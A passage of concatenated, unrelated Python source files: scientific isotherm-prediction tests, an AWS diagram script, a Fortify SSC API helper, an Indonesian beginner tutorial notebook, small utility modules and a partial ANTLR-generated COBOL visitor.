-20.02813021, -19.54521172, -19.06229324, -18.57937475,
-18.09645626, -17.61353777, -17.13061929, -16.6477008 ,
-16.16478231, -15.68186382, -15.19894534, -14.71602685,
-14.23310836, -13.75018988, -13.26727139, -12.7843529 ,
-12.30143441, -11.81851593, -11.33559744, -10.85267895,
-10.36976046, -9.88684198, -9.40392349, -8.921005 ,
-8.43808651, -7.95516803, -7.47224954, -6.98933105,
-6.50641257, -6.02349408, -5.54057559, -5.0576571 ,
-4.57473862, -4.09182013, -3.60890164, -3.12598315,
-2.64306467, -2.16014618, -1.67722769, -1.19430921,
-0.71139072, -0.22847223])
print(str(np.sum(np.abs(compute_histo.E-reference_hist))))
assert np.sum(np.abs(compute_histo.E-reference_hist))<=0.1,"Histogram doesnot matches reference!"
#%%
def test_machlearn(compute_ml):
print("Testing the trained ML model")
import numpy as np
print(str(compute_ml.gp.predict([[6,0.5,10,5]])))
assert np.abs(compute_ml.gp.predict([[6,0.5,10,5]])-3) <=1, "Coordination number predicted doesn't agree with reference!" # See if the predicted n1 is within a certain expected range
#%%
def test_machlearn2():
print("Testing the trained ML model")
import numpy as np
import joblib
import pyIsoP
import os
path_to_joblib_dump=os.path.dirname(pyIsoP.__file__)+'/data/gprmodel_pyIsoP.joblib'
gpr = joblib.load(path_to_joblib_dump)
# print(str(gpr.predict([[6,0.5,10,5]])))
assert np.abs(gpr.predict([[6,0.5,10,5]])-3) <=1, "Coordination number predicted doesn't agree with reference!" # See if the predicted n1 is within a certain expected range
#%%
def test_predictor(compute_histo, compute_ml):
from pyIsoP import predictor
import numpy as np
print("Testing the isotherm prediction routine")
n_pressures=20
P=np.linspace(1E-5,100,n_pressures)
T=298
Vf=0.66
lcd=5.1
pld=2.4
X_test = np.array([[Vf, lcd, pld],]*n_pressures)
X_test = np.hstack((np.reshape(np.log10(P*1E5),(n_pressures,1)), X_test))
n1=compute_ml.gp.predict(X_test)
refvals=np.array([[ 23.78752723],
[ 43.53239219],
[ 44.43192367],
[ 44.89588641],
[ 45.1897038 ],
[ 45.39587854],
[ 45.5499096 ],
[ 45.66999489],
[ 45.76656782],
[ 45.84609705],
[ 45.91283278],
[ 45.96969572],
[ 46.01876613],
[ 46.06156964],
[ 46.09925272],
[ 46.1326949 ],
[ 46.16258297],
[ 46.18946154],
[ 46.21376834],
[ 46.23585941]])
# h=compute_histo
g_L_CH2=predictor.predictors.predict_isotherm(T,P,Vf,compute_histo,n1,epsilon=46,MA=14)
print(g_L_CH2)
print(refvals)
print(str(np.sum(np.abs(g_L_CH2-refvals))))
assert(np.sum(np.abs(g_L_CH2-refvals))<=5), "The predicted isotherm does not match the reference!"
#%%
|
from diagrams import Cluster, Diagram, Edge, Node
from diagrams.aws.migration import ADS
from diagrams.aws.network import ALB
from diagrams.aws.network import VPCElasticNetworkInterface
from diagrams.aws.compute import Fargate
from diagrams.aws.database import Aurora
from diagrams.aws.storage import EFS
from diagrams.aws.storage import S3
from diagrams.aws.integration import MQ
from diagrams.aws.compute import ElasticContainerServiceContainer
from diagrams.aws.network import NATGateway
from diagrams.custom import Custom
from diagrams.aws.compute import ApplicationAutoScaling
from diagrams.aws.network import CloudFront
from diagrams.aws.storage import SimpleStorageServiceS3Bucket
from diagrams.aws.network import InternetGateway
from diagrams.aws.management import CloudformationStack
from urllib.request import urlretrieve
diagramGraphAttr = {
# "splines": "ortho",
# "concentrate":"true",
}
vpcGraphAttr = {
"bgcolor":"transparent",
"pencolor":"black",
"penwidth":"2.0",
"fontsize": "24",
"fontname":"Times-Roman bold",
}
subnetGraphAttr = {
"bgcolor":"transparent",
"pencolor":"orange",
"penwidth":"3.0",
"style":"rounded,dashed,bold",
"fontsize": "22",
"fontname":"Times-Roman bold",
}
serviceBoundaryGraphAttr = {
"bgcolor":"transparent",
"style":"rounded,dashed,bold",
"penwidth":"2.0",
"fontsize": "18",
"fontname":"Times-Roman bold",
}
autoScaleGraphAttr = {
"bgcolor":"cornsilk",
"style":"rounded,bold",
"pencolor":"transparent",
"fontcolor":"transparent",
}
def egressEdge():
return Edge(color="black", style="bold")
def ingressEdge(hostName=None):
if hostName:
return Edge(color="black", style="bold", xlabel=f"Host={hostName}")
return Edge(color="black", style="bold")
def blank():
return Node("", shape="plaintext", height="0.0", width="0.0")
# Edges that connect to other services within the private subnet
def interServiceEdge(label=None):
if label:
return Edge(style="solid", xlabel=label)
return Edge(style="solid")
# Edges that connect a task to an ENI
def eniEdge():
return Edge(color="red", style="bold")
def wowzaNode():
wowzaIcon = "icons/wowzaIcon.png"
urlretrieve("https://www.wowza.com/uploads/images/Wowza-Professional-Services-Icon-250x250.png", wowzaIcon)
return Custom("Wowza\n(external)", wowzaIcon)
class DotDict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
class FargateTask:
def __init__(self, taskName:str, containers:dict, ingressName:str = None):
"""Constructs a cluster with all of the common components of a Fargate task, such as an ENI and a list of containers.\n
Exposes the containers by name when done for adding additional connections."""
clusterName = f"{taskName} Fargate Task"
fargateGraphAttr = {
"bgcolor":"transparent",
"style":"rounded,bold",
"fontcolor":"black",
}
with Cluster (clusterName, graph_attr=fargateGraphAttr):
# Make eni with a connection to
self.eni = VPCElasticNetworkInterface("Private IP")
eniConnection = self.eni
# If there are multiple containers, add an empty control point for the connecting
# lines just to make it a bit cleaner. Otherwise, we'll connect the container directly
# to the eni
if len(containers.keys()) > 1:
eniConnection = blank()
self.eni - eniEdge() - eniConnection
# Make egress line from eni to left edge
blank() << egressEdge() << self.eni
# Make ingress line from left edge to eni
if ingressName:
blank() >> ingressEdge(ingressName) >> self.eni
# Make containers
self.containers = DotDict({})
for containerName, containerPort in containers.items():
container = ElasticContainerServiceContainer(f"{containerName}:{containerPort}")
self.containers[containerName] = container
eniConnection - eniEdge() - container
with Diagram("Digital Exhibits and Collections", show=False, graph_attr=diagramGraphAttr, direction="LR", outformat="png"):
wowza = wowzaNode()
mediaBucket = S3("MediaBucket\n(foundation)")
wowza - mediaBucket
logBucket = SimpleStorageServiceS3Bucket("Logs\n(foundation)")
with Cluster("Unpeered VPC", graph_attr=vpcGraphAttr):
igw = InternetGateway("Internet Gateway")
with Cluster("Public Subnet", graph_attr=subnetGraphAttr):
lb = ALB("ALB:443\n(foundation)")
igw >> egressEdge() >> lb
nat = NATGateway("NAT\n(external)")
igw << egressEdge() << nat
with Cluster("Private Subnet", graph_attr=subnetGraphAttr):
blankIngress = blank()
lb >> Edge(color="black", style="bold", label="Route on host header") >> blankIngress
blankEgress = blank()
nat << egressEdge() << blankEgress
db = Aurora("Postgres\n(external)")
ns = ADS("Private Namespace\n(foundation)")
with Cluster("Honeycomb", graph_attr=serviceBoundaryGraphAttr):
honeycombEfs = EFS("FileSystem")
rabbit = MQ("Rabbit MQ")
blankRabbit = blank()
blankRabbit - interServiceEdge() - rabbit
blankNs = blank()
ns - interServiceEdge() - blankNs
solrTask = FargateTask(taskName="SolrService", containers={"Solr":8983})
solrTask.containers.Solr - interServiceEdge("/solr") - honeycombEfs
blankNs - interServiceEdge() - solrTask.eni
with Cluster("AppService Autoscale", graph_attr=autoScaleGraphAttr):
asg = ApplicationAutoScaling("Auto Scale 1-3 Tasks\non ALB OPS per target")
appTask = FargateTask(taskName="AppService", ingressName="honeycomb", containers={"Nginx":80, "Rails":3000})
appTask.containers.Rails - interServiceEdge("/rails") - honeycombEfs
appTask.containers.Rails - interServiceEdge() - blankRabbit
appTask.containers.Rails - interServiceEdge() - db
appTask.containers.Rails - interServiceEdge() - mediaBucket
appTask.containers.Nginx - appTask.containers.Rails
blankNs - interServiceEdge() - appTask.eni
with Cluster("SneakersService Autoscale", graph_attr=autoScaleGraphAttr):
asg = ApplicationAutoScaling("Auto Scale 0-3 Tasks\non jobs in honeypot_images queue")
sneakersTask = FargateTask(taskName="SneakersService", containers={"Rails":3000})
sneakersTask.containers.Rails - interServiceEdge("/rails") - honeycombEfs
sneakersTask.containers.Rails - interServiceEdge() - blankRabbit
asg - sneakersTask
with Cluster("Honeypot", graph_attr=serviceBoundaryGraphAttr):
honeypotEfs = EFS("FileSystem")
honeypotTask = FargateTask("AppService", {"Nginx":80, "Rails":3019}, "honeypot")
honeypotTask.containers.Rails - interServiceEdge() - honeypotEfs
honeypotTask.containers.Nginx - honeypotTask.containers.Rails
with Cluster("Buzz", graph_attr=serviceBoundaryGraphAttr):
buzzTask = FargateTask("AppService", {"Rails":80}, "buzz")
buzzTask.containers.Rails - interServiceEdge() - db
with Cluster("Beehive", graph_attr=serviceBoundaryGraphAttr):
distribution = CloudFront("Distribution")
bucket = SimpleStorageServiceS3Bucket("Static Assets")
distribution - bucket - logBucket |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import socket
from fortifyapi.fortify import FortifyApi
from webbreaker.common.api_response_helper import APIHelper
from webbreaker.fortify.config import FortifyConfig
from webbreaker.common.webbreakerhelper import WebBreakerHelper
class FortifyHelper(object):
def __init__(self, fortify_url, fortify_username, fortify_password):
# Static
self.extension = 'fpr'
# Required Globals
self.fortify_url = fortify_url
self.username = fortify_username
self.password = fortify_password
self.config = FortifyConfig()
self.runenv = WebBreakerHelper.check_run_env()
self.api = self._setup_fortify_ssc_api()
def create_application_version(self, application_name, version_name, application_template, description,
application_id=None):
"""
Creates a new Version under the specified Application ID.
:param application_name: Name of the Application to put the Version under.
:param application_id: ID of the Application. If None, creates a new Application with the application_name.
:param version_name: Name of the Version to create.
:param application_template: Brought in from the config.ini during the FortifyUpload Class __init__
:param description: Description for Application Version
:return: Version ID of the newly created Version.
"""
response = self.api.create_application_version(application_name=application_name,
application_id=application_id,
application_template=application_template,
version_name=version_name,
description=description)
APIHelper().check_for_response_errors(response)
return response.data['data']['id']
def download_version(self, version_id):
"""
Downloads the Version specified, checks for errors, then returns the data & file name (Version name)
:param version_id: Version ID to download
:return: Response data that will be written to the file & the file_name of where to download it.
"""
response, file_name = self.api.download_artifact_scan(version_id)
APIHelper().check_for_response_errors(response)
return response.data, file_name
def finalize_application_version_creation(self, version_id, custom_value):
custom_attribute = self._get_custom_attribute(custom_value)
response = \
self.api.bulk_create_new_application_version_request(version_id=version_id,
development_phase=self.config.development_phase,
development_strategy=self.config.development_strategy,
accessibility=self.config.accessibility,
business_risk_ranking=self.config.business_risk_ranking,
custom_attribute=custom_attribute
)
APIHelper().check_for_response_errors(response)
def _get_custom_attribute(self, custom_value=None):
custom_attribute_id = self._get_attribute_definition_id(search_expression=self.config.custom_attribute_name)
if custom_value:
return custom_attribute_id, custom_value
else:
return custom_attribute_id, self.config.custom_attribute_value
def get_application_id(self, application_name):
"""
Returns the ID of the specified Application. Project is a deprecated name for Application.
:return: ID of the Application
"""
response = self.api.get_projects()
APIHelper().check_for_response_errors(response)
for application in response.data['data']:
if application['name'] == application_name:
return application['id']
return None
def get_applications_and_versions(self):
"""
Gets every application & Version for listing. It returns the response data after checking for errors.
:return: Response data that will be used to list Applications & Versions
"""
response = self.api.get_all_project_versions()
APIHelper().check_for_response_errors(response)
return response.data['data']
def _get_attribute_definition_id(self, search_expression):
response = self.api.get_attribute_definition(search_expression=search_expression)
if response.success:
if response.data['data'] is not []:
return response.data['data'][0]['id']
return ''
def get_version_id(self, application_name, version_name):
"""
Returns the ID of the specified Application. Project is a deprecated name for Application
:return: ID of the Version
"""
response = self.api.get_all_project_versions()
APIHelper().check_for_response_errors(response)
for version in response.data['data']:
if version['project']['name'] == application_name:
if version['name'] == version_name:
return version['id']
return None
def project_version_description(self):
if self.runenv == "jenkins":
return "WebInspect scan from WebBreaker " + os.getenv('JOB_URL', "jenkins server")
else:
return "WebBreaker scan from WebBreaker host " + socket.getfqdn()
def _setup_fortify_ssc_api(self):
"""
Sets up the FortifyAPI client. Uses the username & password set in init to retrieve a token. Then use that token
to initialize the API client.
:return: API client class that can interact with Fortify SSC API.
"""
api = FortifyApi(host=self.fortify_url,
username=self.username,
password=self.password,
verify_ssl=self.config.verify_ssl)
response_token = api.get_token()
APIHelper().check_for_response_errors(response_token)
return FortifyApi(self.fortify_url, token=response_token.data['data']['token'],
verify_ssl=self.config.verify_ssl)
def upload_application_version_file(self, version_id, file_name):
response = self.api.upload_artifact_scan(file_path=('{0}.{1}'.format(file_name, self.extension)),
project_version_id=version_id)
APIHelper().check_for_response_errors(response)
@staticmethod
def trim_ext(file):
try:
return os.path.splitext(os.path.basename(file))[0]
except (TypeError, AttributeError):
return file
|
#!/usr/bin/env python
# coding: utf-8
# # [Code Hello World](https://academy.dqlab.id/main/livecode/45/110/524)
# In[1]:
print(10*2+5)
print("Academy DQLab")
# # [Melakukan Comment Pada Python](https://academy.dqlab.id/main/livecode/45/110/525)
# In[2]:
print(10*2+5) #fungsi matematika
print("Academy DQLab") #fungsi mencetak kalimat
# # [Printing Data Type](https://academy.dqlab.id/main/livecode/45/110/527)
# In[3]:
var_string="Belajar Python DQLAB"
var_int=10
var_float=3.14
var_list=[1,2,3,4]
var_tuple=("satu","dua","tiga")
var_dict={"nama":"Ali", 'umur':20}
print(var_string)
print(var_int)
print(var_float)
print(var_list)
print(var_tuple)
print(var_dict)
print(type(var_string))
print(type(var_int))
print(type(var_float))
print(type(var_list))
print(type(var_tuple))
print(type(var_dict))
# # [IF Statement](https://academy.dqlab.id/main/livecode/45/111/529)
# In[4]:
i = 7 #inisialisasi variable i yang memiliki nilai 10
if(i==10): #pengecekan nilai i apakah sama dengan 10
print("ini adalah angka 10") #jika TRUE maka akan mencetak kalimat ini
# # [IF … ELSE …](https://academy.dqlab.id/main/livecode/45/111/530)
# In[5]:
i = 5 #inisialisasi variable i yang memiliki nilai 10
if(i==10): #pengecekan nilai i apakah sama dengan 10
print("ini adalah angka 10") #jika TRUE maka akan mencetak kalimat ini
else:
print("bukan angka 10") #jika FALSE akan mencetak kalimat ini
# # [IF … ELIF … ELSE ….](https://academy.dqlab.id/main/livecode/45/111/531)
# In[6]:
i=3
if(i==5):
print("ini adalah angka 5")
elif(i>5):
print("lebih besar dari 5")
else:
print("lebih kecil dari 5")
# # [NESTED IF](https://academy.dqlab.id/main/livecode/45/111/532)
# In[7]:
if (i<7):
print("nilai i kurang dari 7")
if (i<3):
print("nilai i kurang dari 7 dan kurang dari 3")
else:
print("nilai i kurang dari 7 tapi lebih dari 3")
# # [Praktek Operasi Matematika](https://academy.dqlab.id/main/livecode/45/112/534)
# In[8]:
a=10
b=5
selisih = a-b
jumlah = a+b
kali = a*b
bagi = a/b
print("Hasil penjumlahan dan b adalah", jumlah)
print("Selisih a dan b adalah :",selisih)
print("Hasil perkalian a dan b adalah :",kali)
print("Hasil pembagian a dan b adalah:",bagi)
# # [Operasi modulus](https://academy.dqlab.id/main/livecode/45/112/536)
# In[9]:
c=10
d=3
modulus=c%d
print("Hasil modulus",modulus)
# # [Tugas Mid Praktek](https://academy.dqlab.id/main/livecode/45/112/538)
# In[10]:
angka=5
if(angka%2 == 0):
print("angka termasuk bilangan genap")
else:
print("angka termasuk bilangan ganjil")
# # [while](https://academy.dqlab.id/main/livecode/45/113/540)
# In[11]:
j = 0 #nilai awal j =0
while j<6: #ketika j kurang dari 6 lakukan perulangan, jika tidak stop perulangan
print("Ini adalah perulangan ke -",j) #lakukan perintah ini ketika perulangan
j=j+1 #setiap kali diakhir perulangan update nilai dengan ditambah 1.
# # [for (1)](https://academy.dqlab.id/main/livecode/45/113/542)
# In[12]:
for i in range (1,6): #perulangan for sebagai inisialisasi dari angka 1 hingga angka yang lebih kecil daripada 6.
print("Ini adalah perulangan ke -", i) #perintah jika looping akan tetap berjalan
# # [for (2) with access element](https://academy.dqlab.id/main/livecode/45/113/543)
# In[13]:
for i in range (1,11):
if(i%2 == 0):
print("Angka genap",i)
else:
print("Angka ganjil",i)
# # [Membuat fungsi sendiri](https://academy.dqlab.id/main/livecode/45/114/545)
# In[14]:
# Membuat Fungsi
def salam():
print("Hello, Selamat Pagi")
## Pemanggilan Fungsi
salam()
# # [Parameter pada fungsi](https://academy.dqlab.id/main/livecode/45/114/546)
# In[15]:
def luas_segitiga(alas, tinggi): #alas dan tinggi merupakan parameter yang masuk
luas = (alas * tinggi) / 2
print("Luas segitiga: %f" % luas);
# Pemanggilan fungsi
##4 dan 6 merupakan parameter yang diinputkan kedalam fungsi luas segitiga
luas_segitiga(4, 6)
# # [Fungsi dengan Return Value](https://academy.dqlab.id/main/livecode/45/114/547)
# In[16]:
def luas_segitiga(alas, tinggi): #alas dan tinggi merupakan parameter yang masuk
luas = (alas * tinggi) / 2
return luas
# Pemanggilan fungsi
##4 dan 6 merupakan parameter yang diinputkan kedalam fungsi luas segitiga
print("Luas segitiga: %d" % luas_segitiga(4, 6))
# # [Import Package dan Menggunakan modul](https://academy.dqlab.id/main/livecode/45/115/549)
# In[17]:
import math
print("Nilai pi adalah:", math.pi)# math.pi merupakan sintak untuk memanggil fungsi
# # [Import dengan Module Rename atau Alias](https://academy.dqlab.id/main/livecode/45/115/550)
# In[18]:
import math as m #menggunakan m sebagai module rename atau alias
print("Nilai pi adalah:", m.pi) #m.pi merupakan sintak untuk memanggil fungsi
# # [Import Sebagian Fungsi](https://academy.dqlab.id/main/livecode/45/115/560)
# In[19]:
from math import pi
print("Nilai pi adalah", pi)
# # [Import Semua isi Moduls](https://academy.dqlab.id/main/livecode/45/115/561)
# In[20]:
from math import *
print("Nilai e adalah:", e)
# # [Membaca Teks File (CSV)](https://academy.dqlab.id/main/livecode/45/116/552)
# In[22]:
import csv
# tentukan lokasi file, nama file, dan inisialisasi csv
f = open('penduduk_gender_head.csv', 'r')
reader = csv.reader(f)
# membaca baris per baris
for row in reader:
print (row)
# menutup file csv
f.close()
# # [Membaca file CSV dengan menggunakan PANDAS](https://academy.dqlab.id/main/livecode/45/116/553)
# In[23]:
import pandas as pd
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
print(table)
# # [Bar Chart](https://academy.dqlab.id/main/livecode/45/117/555)
# In[24]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
x_label = table['NAMA KELURAHAN']
plt.bar(x=np.arange(len(x_label)),height=table['LAKI-LAKI WNI'])
plt.show()
# # [Parameter dalam Grafik (Memberikan Nilai Axis dari data CSV)](https://academy.dqlab.id/main/livecode/45/117/556)
# In[25]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
x_label = table['NAMA KELURAHAN']
plt.bar(x=np.arange(len(x_label)),height=table['LAKI-LAKI WNI'])
plt.xticks(np.arange(len(x_label)), table['NAMA KELURAHAN'], rotation=30)
plt.show()
# # [Menambah Title dan Label pada Grafik](https://academy.dqlab.id/main/livecode/45/117/557)
# In[26]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
x_label = table['NAMA KELURAHAN']
plt.bar(x=np.arange(len(x_label)),height=table['LAKI-LAKI WNI'])
plt.xticks(np.arange(len(x_label)), table['NAMA KELURAHAN'], rotation=90)
plt.xlabel('Keluarahan di Jakarta pusat')
plt.ylabel('Jumlah Penduduk Laki - Laki')
plt.title('Persebaran Jumlah Penduduk Laki-Laki di Jakarta Pusat')
plt.show()
|
import hotstepper.analysis.statistics as s
import hotstepper.analysis.Sequency as Sequency
to_add = [
s.pacf,
s.acf,
s.ecdf,
s.histogram,
s.span_and_weights,
s.mean_integrate,
s.mean,
s.var,
s.std,
s.integrate,
s.percentile,
s.min,
s.max,
s.mode,
s.median,
s.covariance,
s.correlation,
s.describe,
s.rolling_function_step
]
def apply_mixins(cls):
for a in to_add:
setattr(cls,a.__name__,a)
|
"""The apns component."""
|
import requests
from .requests_auth import MsalAuth
class MsalSession(requests.Session):
def __init__(self, token_acquirer, proxies=None):
super().__init__()
self.auth = MsalAuth(token_acquirer)
self.proxies = proxies
|
# Copyright (c) 2012-2016 Seafile Ltd.
from django.conf.urls import patterns, url
from .views import (info, useradmin, user_info, user_remove, useradmin_search,
user_toggle_status, user_set_quota)
urlpatterns = patterns(
'',
url('^info/$', info, name="info"),
url('^useradmin/$', useradmin, name="useradmin"),
url(r'^useradmin/info/(?P<email>[^/]+)/$', user_info, name='user_info'),
url(r'^useradmin/remove/(?P<email>[^/]+)/$', user_remove, name='user_remove'),
url('^useradmin/search/$', useradmin_search, name="useradmin_search"),
url(r'^useradmin/set_quota/(?P<email>[^/]+)/$', user_set_quota, name='user_set_quota'),
url(r'^useradmin/toggle_status/(?P<email>[^/]+)/$', user_toggle_status, name='user_toggle_status'),
)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
i = 2
while(i < 100):
j = 2
while(j <= (i/j)):
if not(i%j): break
j = j + 1
if (j > i/j) : print i, " 是素数"
i = i + 1
print "Good bye!"
|
# Generated from Cobol85.g4 by ANTLR 4.7.1
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by Cobol85Parser.
class Cobol85Visitor(ParseTreeVisitor):
# Visit a parse tree produced by Cobol85Parser#startRule.
def visitStartRule(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#compilationUnit.
def visitCompilationUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programUnit.
def visitProgramUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#endProgramStatement.
def visitEndProgramStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#identificationDivision.
def visitIdentificationDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#identificationDivisionBody.
def visitIdentificationDivisionBody(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programIdParagraph.
def visitProgramIdParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#authorParagraph.
def visitAuthorParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#installationParagraph.
def visitInstallationParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dateWrittenParagraph.
def visitDateWrittenParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dateCompiledParagraph.
def visitDateCompiledParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#securityParagraph.
def visitSecurityParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#remarksParagraph.
def visitRemarksParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentDivision.
def visitEnvironmentDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentDivisionBody.
def visitEnvironmentDivisionBody(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#configurationSection.
def visitConfigurationSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#configurationSectionParagraph.
def visitConfigurationSectionParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sourceComputerParagraph.
def visitSourceComputerParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#objectComputerParagraph.
def visitObjectComputerParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#objectComputerClause.
def visitObjectComputerClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#memorySizeClause.
def visitMemorySizeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#diskSizeClause.
def visitDiskSizeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#collatingSequenceClause.
def visitCollatingSequenceClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#collatingSequenceClauseAlphanumeric.
def visitCollatingSequenceClauseAlphanumeric(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#collatingSequenceClauseNational.
def visitCollatingSequenceClauseNational(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#segmentLimitClause.
def visitSegmentLimitClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#characterSetClause.
def visitCharacterSetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#specialNamesParagraph.
def visitSpecialNamesParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#specialNameClause.
def visitSpecialNameClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetClause.
def visitAlphabetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetClauseFormat1.
def visitAlphabetClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetLiterals.
def visitAlphabetLiterals(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetThrough.
def visitAlphabetThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetAlso.
def visitAlphabetAlso(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetClauseFormat2.
def visitAlphabetClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#channelClause.
def visitChannelClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClause.
def visitClassClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClauseThrough.
def visitClassClauseThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClauseFrom.
def visitClassClauseFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClauseTo.
def visitClassClauseTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#currencySignClause.
def visitCurrencySignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#decimalPointClause.
def visitDecimalPointClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#defaultComputationalSignClause.
def visitDefaultComputationalSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#defaultDisplaySignClause.
def visitDefaultDisplaySignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentSwitchNameClause.
def visitEnvironmentSwitchNameClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentSwitchNameSpecialNamesStatusPhrase.
def visitEnvironmentSwitchNameSpecialNamesStatusPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#odtClause.
def visitOdtClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reserveNetworkClause.
def visitReserveNetworkClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicCharactersClause.
def visitSymbolicCharactersClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicCharacters.
def visitSymbolicCharacters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inputOutputSection.
def visitInputOutputSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inputOutputSectionParagraph.
def visitInputOutputSectionParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileControlParagraph.
def visitFileControlParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileControlEntry.
def visitFileControlEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#selectClause.
def visitSelectClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileControlClause.
def visitFileControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#assignClause.
def visitAssignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reserveClause.
def visitReserveClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#organizationClause.
def visitOrganizationClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paddingCharacterClause.
def visitPaddingCharacterClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordDelimiterClause.
def visitRecordDelimiterClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#accessModeClause.
def visitAccessModeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordKeyClause.
def visitRecordKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alternateRecordKeyClause.
def visitAlternateRecordKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#passwordClause.
def visitPasswordClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileStatusClause.
def visitFileStatusClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relativeKeyClause.
def visitRelativeKeyClause(self, ctx):
